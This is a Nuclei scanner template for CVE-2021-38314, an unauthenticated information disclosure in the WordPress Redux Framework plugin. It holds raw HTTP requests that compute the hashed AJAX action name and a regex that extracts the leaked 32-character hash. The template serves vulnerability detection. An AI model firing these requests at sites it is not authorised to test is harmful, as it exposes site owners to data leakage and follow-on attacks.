nuclei-templates/cves/2021/CVE-2021-38314.yaml

47 lines
1.1 KiB
YAML
Raw Normal View History

id: CVE-2021-38314
2021-09-16 14:08:12 +00:00
info:
name: Redux Framework - Unauthenticated Sensitive Information Disclosure
2021-09-16 14:08:12 +00:00
author: meme-lord
severity: medium
2021-09-17 09:50:33 +00:00
reference:
- https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314
2021-09-16 14:08:12 +00:00
tags: cve,cve2021,wordpress
requests:
- raw:
- |
GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body)<50"
- type: regex
name: meme
regex:
- '[a-f0-9]{32}'
part: body
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "[a-f0-9]{32}"